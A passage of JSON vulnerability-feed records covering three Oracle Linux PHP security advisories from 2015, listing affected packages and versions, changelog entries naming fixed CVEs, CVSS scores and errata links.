"i686", "packageFilename": "php-tidy-5.3.3-46.el6_6.i686.rpm", "packageName": "php-tidy", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "i686", "packageFilename": "php-dba-5.3.3-46.el6_6.i686.rpm", "packageName": "php-dba", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "x86_64", "packageFilename": "php-dba-5.3.3-46.el6_6.x86_64.rpm", "packageName": "php-dba", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "x86_64", "packageFilename": "php-zts-5.3.3-46.el6_6.x86_64.rpm", "packageName": "php-zts", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "x86_64", "packageFilename": "php-soap-5.3.3-46.el6_6.x86_64.rpm", "packageName": "php-soap", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "src", "packageFilename": "php-5.3.3-46.el6_6.src.rpm", "packageName": "php", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "src", "packageFilename": "php-5.3.3-46.el6_6.src.rpm", "packageName": "php", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "x86_64", "packageFilename": "php-xml-5.3.3-46.el6_6.x86_64.rpm", "packageName": "php-xml", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "i686", "packageFilename": "php-fpm-5.3.3-46.el6_6.i686.rpm", "packageName": "php-fpm", "operator": "lt"}], "description": "[5.3.3-46]\n- fix gzfile accept paths with NUL character #1213407\n- fix patch for CVE-2015-4024\n[5.3.3-45]\n- fix more functions accept paths with NUL character #1213407\n[5.3.3-44]\n- soap: missing fix for #1222538 and #1204868\n[5.3.3-43]\n- core: fix multipart/form-data request can use excessive\n amount of CPU usage CVE-2015-4024\n- fix various functions accept paths with NUL character\n CVE-2015-4026, #1213407\n- ftp: fix integer overflow leading to heap overflow when\n reading FTP file listing CVE-2015-4022\n- phar: fix buffer over-read in metadata parsing CVE-2015-2783\n- phar: invalid pointer free() in phar_tar_process_metadata()\n CVE-2015-3307\n- phar: fix buffer overflow in phar_set_inode() CVE-2015-3329\n- phar: fix memory corruption in phar_parse_tarfile caused by\n empty entry file name CVE-2015-4021\n- soap: more fix type confusion through unserialize #1222538\n[5.3.3-42]\n- soap: more fix type confusion through unserialize #1204868\n[5.3.3-41]\n- core: fix double in zend_ts_hash_graceful_destroy CVE-2014-9425\n- core: fix use-after-free in unserialize CVE-2015-2787\n- exif: fix free on unitialized pointer CVE-2015-0232\n- gd: fix buffer read overflow in gd_gif.c CVE-2014-9709\n- date: fix use after free vulnerability in unserialize CVE-2015-0273\n- enchant: fix heap buffer overflow in enchant_broker_request_dict\n CVE-2014-9705\n- phar: use after free in phar_object.c CVE-2015-2301\n- soap: fix type confusion through unserialize", "edition": 3, "reporter": "Oracle", "published": "2015-07-09T00:00:00", "title": "php security update", "type": "oraclelinux", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "unix", "cvelist": ["CVE-2014-9705", "CVE-2015-2787", "CVE-2015-0232", "CVE-2015-4601", "CVE-2015-2783", "CVE-2015-3329", "CVE-2015-2301", "CVE-2014-9425", "CVE-2014-9709", "CVE-2015-0273", "CVE-2015-4148", "CVE-2015-3307", "CVE-2015-4024", "CVE-2015-4021", "CVE-2015-4602", "CVE-2015-4026", "CVE-2015-4147", "CVE-2015-3411", "CVE-2015-4600", "CVE-2015-4022", "CVE-2015-3412", "CVE-2015-4603", "CVE-2015-4599", "CVE-2015-4598"], "modified": "2015-07-09T00:00:00", "id": "ELSA-2015-1218", "href": "http://linux.oracle.com/errata/ELSA-2015-1218.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T01:44:09", "references": [], "affectedPackage": [{"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.4.40-1.el6", "arch": "x86_64", "packageFilename": "php54-php-5.4.40-1.el6.x86_64.rpm", "packageName": "php54-php", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.4.40-1.el7", "arch": "x86_64", "packageFilename": "php54-php-pdo-5.4.40-1.el7.x86_64.rpm", "packageName": "php54-php-pdo", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.4.40-1.el6", "arch": "x86_64", "packageFilename": "php54-php-imap-5.4.40-1.el6.x86_64.rpm", "packageName": "php54-php-imap", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.4.40-1.el7", "arch": "x86_64", "packageFilename": "php54-php-fpm-5.4.40-1.el7.x86_64.rpm", "packageName": "php54-php-fpm", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.4.40-1.el6", "arch": "src", "packageFilename": "php54-php-5.4.40-1.el6.src.rpm", "packageName": "php54-php", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "2.0-1.el7", "arch": "src", "packageFilename": "php54-2.0-1.el7.src.rpm", "packageName": "php54", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.4.40-1.el7", "arch": "x86_64", "packageFilename": "php54-php-enchant-5.4.40-1.el7.x86_64.rpm", "packageName": "php54-php-enchant", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.4.40-1.el6", "arch": "x86_64", "packageFilename": "php54-php-recode-5.4.40-1.el6.x86_64.rpm", "packageName": "php54-php-recode", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.4.40-1.el7", "arch": "src", "packageFilename": "php54-php-5.4.40-1.el7.src.rpm", "packageName": "php54-php", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.4.40-1.el7", "arch": "x86_64", "packageFilename": "php54-php-process-5.4.40-1.el7.x86_64.rpm", "packageName": "php54-php-process", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.4.40-1.el6", "arch": "x86_64", "packageFilename": "php54-php-enchant-5.4.40-1.el6.x86_64.rpm", "packageName": "php54-php-enchant", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.4.40-1.el6", "arch": "x86_64", "packageFilename": "php54-php-xml-5.4.40-1.el6.x86_64.rpm", "packageName": "php54-php-xml", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.4.40-1.el7", "arch": "x86_64", "packageFilename": "php54-php-bcmath-5.4.40-1.el7.x86_64.rpm", "packageName": "php54-php-bcmath", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "7.0.4-3.el6", "arch": "x86_64", "packageFilename": "php54-php-pecl-zendopcache-7.0.4-3.el6.x86_64.rpm", "packageName": "php54-php-pecl-zendopcache", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.4.40-1.el7", "arch": "x86_64", "packageFilename": "php54-php-cli-5.4.40-1.el7.x86_64.rpm", "packageName": "php54-php-cli", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "7.0.4-3.el7", "arch": "src", "packageFilename": "php54-php-pecl-zendopcache-7.0.4-3.el7.src.rpm", "packageName": "php54-php-pecl-zendopcache", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.4.40-1.el6", "arch": "x86_64", "packageFilename": "php54-php-pgsql-5.4.40-1.el6.x86_64.rpm", "packageName": "php54-php-pgsql", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.4.40-1.el6", "arch": "x86_64", "packageFilename": "php54-php-mysqlnd-5.4.40-1.el6.x86_64.rpm", "packageName": "php54-php-mysqlnd", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.4.40-1.el6", "arch": "x86_64", "packageFilename": "php54-php-tidy-5.4.40-1.el6.x86_64.rpm", "packageName": "php54-php-tidy", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.4.40-1.el7", "arch": "x86_64", "packageFilename": "php54-php-intl-5.4.40-1.el7.x86_64.rpm", "packageName": "php54-php-intl", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.4.40-1.el7", "arch": "x86_64", "packageFilename": "php54-php-mysqlnd-5.4.40-1.el7.x86_64.rpm", "packageName": "php54-php-mysqlnd", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.0-1.el6", "arch": "src", "packageFilename": "php54-2.0-1.el6.src.rpm", "packageName": "php54", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "7.0.4-3.el7", "arch": "x86_64", "packageFilename": "php54-php-pecl-zendopcache-7.0.4-3.el7.x86_64.rpm", "packageName": "php54-php-pecl-zendopcache", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.4.40-1.el7", "arch": "x86_64", "packageFilename": "php54-php-dba-5.4.40-1.el7.x86_64.rpm", "packageName": "php54-php-dba", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.4.40-1.el7", "arch": "x86_64", "packageFilename": "php54-php-devel-5.4.40-1.el7.x86_64.rpm", "packageName": "php54-php-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.4.40-1.el7", "arch": "x86_64", "packageFilename": "php54-php-soap-5.4.40-1.el7.x86_64.rpm", "packageName": "php54-php-soap", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.4.40-1.el7", "arch": "x86_64", "packageFilename": "php54-php-pspell-5.4.40-1.el7.x86_64.rpm", "packageName": "php54-php-pspell", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.4.40-1.el7", "arch": "x86_64", "packageFilename": "php54-php-ldap-5.4.40-1.el7.x86_64.rpm", "packageName": "php54-php-ldap", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.4.40-1.el7", "arch": "x86_64", "packageFilename": "php54-php-xmlrpc-5.4.40-1.el7.x86_64.rpm", "packageName": "php54-php-xmlrpc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.4.40-1.el6", "arch": "x86_64", "packageFilename": "php54-php-odbc-5.4.40-1.el6.x86_64.rpm", "packageName": "php54-php-odbc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.4.40-1.el7", "arch": "x86_64", "packageFilename": "php54-php-5.4.40-1.el7.x86_64.rpm", "packageName": "php54-php", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.4.40-1.el6", "arch": "x86_64", "packageFilename": "php54-php-gd-5.4.40-1.el6.x86_64.rpm", "packageName": "php54-php-gd", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.4.40-1.el7", "arch": "x86_64", "packageFilename": "php54-php-recode-5.4.40-1.el7.x86_64.rpm", "packageName": "php54-php-recode", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.4.40-1.el6", "arch": "x86_64", "packageFilename": "php54-php-cli-5.4.40-1.el6.x86_64.rpm", "packageName": "php54-php-cli", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.4.40-1.el7", "arch": "x86_64", "packageFilename": "php54-php-pgsql-5.4.40-1.el7.x86_64.rpm", "packageName": "php54-php-pgsql", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.4.40-1.el7", "arch": "x86_64", "packageFilename": "php54-php-mbstring-5.4.40-1.el7.x86_64.rpm", "packageName": "php54-php-mbstring", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.4.40-1.el6", "arch": "x86_64", "packageFilename": "php54-php-fpm-5.4.40-1.el6.x86_64.rpm", "packageName": "php54-php-fpm", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.4.40-1.el6", "arch": "x86_64", "packageFilename": "php54-php-pspell-5.4.40-1.el6.x86_64.rpm", "packageName": "php54-php-pspell", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.4.40-1.el6", "arch": "x86_64", "packageFilename": "php54-php-pdo-5.4.40-1.el6.x86_64.rpm", "packageName": "php54-php-pdo", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.4.40-1.el6", "arch": "x86_64", "packageFilename": "php54-php-soap-5.4.40-1.el6.x86_64.rpm", "packageName": "php54-php-soap", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "2.0-1.el7", "arch": "x86_64", "packageFilename": "php54-scldevel-2.0-1.el7.x86_64.rpm", "packageName": "php54-scldevel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.4.40-1.el6", "arch": "x86_64", "packageFilename": "php54-php-common-5.4.40-1.el6.x86_64.rpm", "packageName": "php54-php-common", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.4.40-1.el6", "arch": "x86_64", "packageFilename": "php54-php-dba-5.4.40-1.el6.x86_64.rpm", "packageName": "php54-php-dba", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.4.40-1.el7", "arch": "x86_64", "packageFilename": "php54-php-xml-5.4.40-1.el7.x86_64.rpm", "packageName": "php54-php-xml", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.4.40-1.el6", "arch": "x86_64", "packageFilename": "php54-php-intl-5.4.40-1.el6.x86_64.rpm", "packageName": "php54-php-intl", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.0-1.el6", "arch": "x86_64", "packageFilename": "php54-2.0-1.el6.x86_64.rpm", "packageName": "php54", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.4.40-1.el7", "arch": "x86_64", "packageFilename": "php54-php-snmp-5.4.40-1.el7.x86_64.rpm", "packageName": "php54-php-snmp", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "2.0-1.el7", "arch": "x86_64", "packageFilename": "php54-runtime-2.0-1.el7.x86_64.rpm", "packageName": "php54-runtime", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.4.40-1.el7", "arch": "x86_64", "packageFilename": "php54-php-gd-5.4.40-1.el7.x86_64.rpm", "packageName": "php54-php-gd", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.4.40-1.el6", "arch": "x86_64", "packageFilename": "php54-php-bcmath-5.4.40-1.el6.x86_64.rpm", "packageName": "php54-php-bcmath", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.4.40-1.el6", "arch": "x86_64", "packageFilename": "php54-php-devel-5.4.40-1.el6.x86_64.rpm", "packageName": "php54-php-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "7.0.4-3.el6", "arch": "src", "packageFilename": "php54-php-pecl-zendopcache-7.0.4-3.el6.src.rpm", "packageName": "php54-php-pecl-zendopcache", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "2.0-1.el7", "arch": "x86_64", "packageFilename": "php54-2.0-1.el7.x86_64.rpm", "packageName": "php54", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.0-1.el6", "arch": "x86_64", "packageFilename": "php54-scldevel-2.0-1.el6.x86_64.rpm", "packageName": "php54-scldevel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.4.40-1.el6", "arch": "x86_64", "packageFilename": "php54-php-ldap-5.4.40-1.el6.x86_64.rpm", "packageName": "php54-php-ldap", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.4.40-1.el6", "arch": "x86_64", "packageFilename": "php54-php-xmlrpc-5.4.40-1.el6.x86_64.rpm", "packageName": "php54-php-xmlrpc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.4.40-1.el6", "arch": "x86_64", "packageFilename": "php54-php-process-5.4.40-1.el6.x86_64.rpm", "packageName": "php54-php-process", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.4.40-1.el7", "arch": "x86_64", "packageFilename": "php54-php-odbc-5.4.40-1.el7.x86_64.rpm", "packageName": "php54-php-odbc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.4.40-1.el6", "arch": "x86_64", "packageFilename": "php54-php-snmp-5.4.40-1.el6.x86_64.rpm", "packageName": "php54-php-snmp", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.0-1.el6", "arch": "x86_64", "packageFilename": "php54-runtime-2.0-1.el6.x86_64.rpm", "packageName": "php54-runtime", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.4.40-1.el6", "arch": "x86_64", "packageFilename": "php54-php-mbstring-5.4.40-1.el6.x86_64.rpm", "packageName": "php54-php-mbstring", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.4.40-1.el7", "arch": "x86_64", "packageFilename": "php54-php-common-5.4.40-1.el7.x86_64.rpm", "packageName": "php54-php-common", "operator": "lt"}], "description": "php54\n[2.0-1]\n- fix incorrect selinux contexts #1194332\nphp54-php\n[5.4.40-1]\n- rebase to PHP 5.4.40 for various security fix #1209887\n[5.4.37-1]\n- rebase to PHP 5.4.37\n[5.4.36-1]\n- rebase to PHP 5.4.36 #1168193\n- fix package name in description\n- php-fpm own session dir\nphp54-php-pecl-zendopcache\n[7.0.4-3]\n- fix use after free CVE-2015-1351\n[7.0.4-2]\n- add upstream patch for failed test\n[7.0.4-1]\n- Update to 7.0.4\n[7.0.3-1]\n- update to 7.0.3 #1055927", "edition": 3, "reporter": "Oracle", "published": "2016-02-04T00:00:00", "title": "php54 security and bug fix update", "type": "oraclelinux", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "unix", "cvelist": ["CVE-2015-2348", "CVE-2014-9705", "CVE-2015-2787", "CVE-2015-0232", "CVE-2015-4601", "CVE-2015-2783", "CVE-2014-9427", "CVE-2015-3329", "CVE-2015-3330", "CVE-2015-2301", "CVE-2014-9709", "CVE-2015-2305", "CVE-2015-0273", "CVE-2014-8142", "CVE-2015-4148", "CVE-2015-4605", "CVE-2015-3307", "CVE-2015-4602", "CVE-2015-4147", "CVE-2015-3411", "CVE-2015-4604", "CVE-2015-4600", "CVE-2014-9652", "CVE-2015-3412", "CVE-2015-4603", "CVE-2015-1351", "CVE-2015-4599", "CVE-2015-0231"], "modified": "2016-02-04T00:00:00", "id": "ELSA-2015-1066", "href": "http://linux.oracle.com/errata/ELSA-2015-1066.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T01:47:20", "references": [], "affectedPackage": [{"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "arch": "x86_64", "packageFilename": "php-ldap-5.4.16-36.el7_1.x86_64.rpm", "packageName": "php-ldap", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "arch": "x86_64", "packageFilename": "php-mysqlnd-5.4.16-36.el7_1.x86_64.rpm", "packageName": "php-mysqlnd", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "arch": "x86_64", "packageFilename": "php-mysql-5.4.16-36.el7_1.x86_64.rpm", "packageName": "php-mysql", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "arch": "x86_64", "packageFilename": "php-gd-5.4.16-36.el7_1.x86_64.rpm", "packageName": "php-gd", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "arch": "x86_64", "packageFilename": "php-cli-5.4.16-36.el7_1.x86_64.rpm", "packageName": "php-cli", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "arch": "x86_64", "packageFilename": "php-odbc-5.4.16-36.el7_1.x86_64.rpm", "packageName": "php-odbc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "arch": "x86_64", "packageFilename": "php-dba-5.4.16-36.el7_1.x86_64.rpm", "packageName": "php-dba", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "arch": "x86_64", "packageFilename": "php-snmp-5.4.16-36.el7_1.x86_64.rpm", "packageName": "php-snmp", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "arch": "x86_64", "packageFilename": "php-mbstring-5.4.16-36.el7_1.x86_64.rpm", "packageName": "php-mbstring", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "arch": "x86_64", "packageFilename": "php-xml-5.4.16-36.el7_1.x86_64.rpm", "packageName": "php-xml", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "arch": "x86_64", "packageFilename": "php-recode-5.4.16-36.el7_1.x86_64.rpm", "packageName": "php-recode", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "arch": "x86_64", "packageFilename": "php-pdo-5.4.16-36.el7_1.x86_64.rpm", "packageName": "php-pdo", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "arch": "x86_64", "packageFilename": "php-5.4.16-36.el7_1.x86_64.rpm", "packageName": "php", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "arch": "x86_64", "packageFilename": "php-intl-5.4.16-36.el7_1.x86_64.rpm", "packageName": "php-intl", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "arch": "x86_64", "packageFilename": "php-process-5.4.16-36.el7_1.x86_64.rpm", "packageName": "php-process", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "arch": "x86_64", "packageFilename": "php-devel-5.4.16-36.el7_1.x86_64.rpm", "packageName": "php-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "arch": "x86_64", "packageFilename": "php-enchant-5.4.16-36.el7_1.x86_64.rpm", "packageName": "php-enchant", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "arch": "x86_64", "packageFilename": "php-fpm-5.4.16-36.el7_1.x86_64.rpm", "packageName": "php-fpm", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "arch": "x86_64", "packageFilename": "php-pgsql-5.4.16-36.el7_1.x86_64.rpm", "packageName": "php-pgsql", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "arch": "x86_64", "packageFilename": "php-xmlrpc-5.4.16-36.el7_1.x86_64.rpm", "packageName": "php-xmlrpc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "arch": "x86_64", "packageFilename": "php-soap-5.4.16-36.el7_1.x86_64.rpm", "packageName": "php-soap", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "arch": "x86_64", "packageFilename": "php-pspell-5.4.16-36.el7_1.x86_64.rpm", "packageName": "php-pspell", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "arch": "src", "packageFilename": "php-5.4.16-36.el7_1.src.rpm", "packageName": "php", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "arch": "x86_64", "packageFilename": "php-bcmath-5.4.16-36.el7_1.x86_64.rpm", "packageName": "php-bcmath", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "arch": "x86_64", "packageFilename": "php-embedded-5.4.16-36.el7_1.x86_64.rpm", "packageName": "php-embedded", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "arch": "x86_64", "packageFilename": "php-common-5.4.16-36.el7_1.x86_64.rpm", "packageName": "php-common", "operator": "lt"}], "description": "[5.4.16-36]\n- fix more functions accept paths with NUL character #1213407\n[5.4.16-35]\n- core: fix multipart/form-data request can use excessive\n amount of CPU usage CVE-2015-4024\n- fix various functions accept paths with NUL character\n CVE-2015-4025, CVE-2015-4026, #1213407\n- fileinfo: fix denial of service when processing a crafted\n file #1213442\n- ftp: fix integer overflow leading to heap overflow when\n reading FTP file listing CVE-2015-4022\n- phar: fix buffer over-read in metadata parsing CVE-2015-2783\n- phar: invalid pointer free() in phar_tar_process_metadata()\n CVE-2015-3307\n- phar: fix buffer overflow in phar_set_inode() CVE-2015-3329\n- phar: fix memory corruption in phar_parse_tarfile caused by\n empty entry file name CVE-2015-4021\n- soap: fix type confusion through unserialize #1222538\n- apache2handler: fix pipelined request executed in deinitialized\n interpreter under httpd 2.4 CVE-2015-3330\n[5.4.16-34]\n- fix memory corruption in fileinfo module on big endian\n machines #1082624\n- fix segfault in pdo_odbc on x86_64 #1159892\n- fix segfault in gmp allocator #1154760\n[5.4.16-33]\n- core: use after free vulnerability in unserialize()\n CVE-2014-8142 and CVE-2015-0231\n- core: fix use-after-free in unserialize CVE-2015-2787\n- core: fix NUL byte injection in file name argument of\n move_uploaded_file() CVE-2015-2348\n- date: use after free vulnerability in unserialize CVE-2015-0273\n- enchant: fix heap buffer overflow in enchant_broker_request_dict\n CVE-2014-9705\n- exif: free called on unitialized pointer CVE-2015-0232\n- fileinfo: fix out of bounds read in mconvert CVE-2014-9652\n- gd: fix buffer read overflow in gd_gif_in.c CVE-2014-9709\n- phar: use after free in phar_object.c CVE-2015-2301\n- soap: fix type confusion through unserialize\n[5.4.16-31]\n- fileinfo: fix out-of-bounds read in elf note headers. CVE-2014-3710\n[5.4.16-29]\n- xmlrpc: fix out-of-bounds read flaw in mkgmtime() CVE-2014-3668\n- core: fix integer overflow in unserialize() CVE-2014-3669\n- exif: fix heap corruption issue in exif_thumbnail() CVE-2014-3670\n[5.4.16-27]\n- gd: fix NULL pointer dereference in gdImageCreateFromXpm().\n CVE-2014-2497\n- gd: fix NUL byte injection in file names. CVE-2014-5120\n- fileinfo: fix extensive backtracking in regular expression\n (incomplete fix for CVE-2013-7345). CVE-2014-3538\n- fileinfo: fix mconvert incorrect handling of truncated\n pascal string size. CVE-2014-3478\n- fileinfo: fix cdf_read_property_info\n (incomplete fix for CVE-2012-1571). CVE-2014-3587\n- spl: fix use-after-free in ArrayIterator due to object\n change during sorting. CVE-2014-4698\n- spl: fix use-after-free in SPL Iterators. CVE-2014-4670\n- network: fix segfault in dns_get_record\n (incomplete fix for CVE-2014-4049). CVE-2014-3597\n[5.4.16-25]\n- fix segfault after startup on aarch64 (#1107567)\n- compile php with -O3 on ppc64le (#1123499)", "edition": 3, "reporter": "Oracle", "published": "2015-06-23T00:00:00", "title": "php security and bug fix update", "type": "oraclelinux", "enchantments": {"score": {"vector": "NONE", "value": 6.8}}, "bulletinFamily": "unix", "cvelist": ["CVE-2015-2348", "CVE-2014-9705", "CVE-2015-2787", "CVE-2015-0232", "CVE-2015-4601", "CVE-2013-7345", "CVE-2015-2783", "CVE-2015-3329", "CVE-2014-3478", "CVE-2015-3330", "CVE-2015-2301", "CVE-2014-3587", "CVE-2012-1571", "CVE-2014-9709", "CVE-2014-4670", "CVE-2014-3668", "CVE-2015-0273", "CVE-2014-8142", "CVE-2015-4148", "CVE-2015-4605", "CVE-2015-3307", "CVE-2015-4025", "CVE-2014-3669", "CVE-2015-4024", "CVE-2015-4021", "CVE-2014-3538", "CVE-2014-5120", "CVE-2014-3597", "CVE-2014-3710", "CVE-2015-4602", "CVE-2015-4026", "CVE-2014-4698", "CVE-2015-4147", "CVE-2015-3411", "CVE-2014-4049", "CVE-2015-4604", "CVE-2014-3670", "CVE-2015-4600", "CVE-2015-4022", "CVE-2014-9652", "CVE-2015-3412", "CVE-2014-2497", "CVE-2015-4603", "CVE-2015-4599", "CVE-2015-4598", "CVE-2015-0231"], "modified": "2015-06-23T00:00:00", "id": "ELSA-2015-1135", "href": "http://linux.oracle.com/errata/ELSA-2015-1135.html", "cvss": {"score": 10.0, "vector": 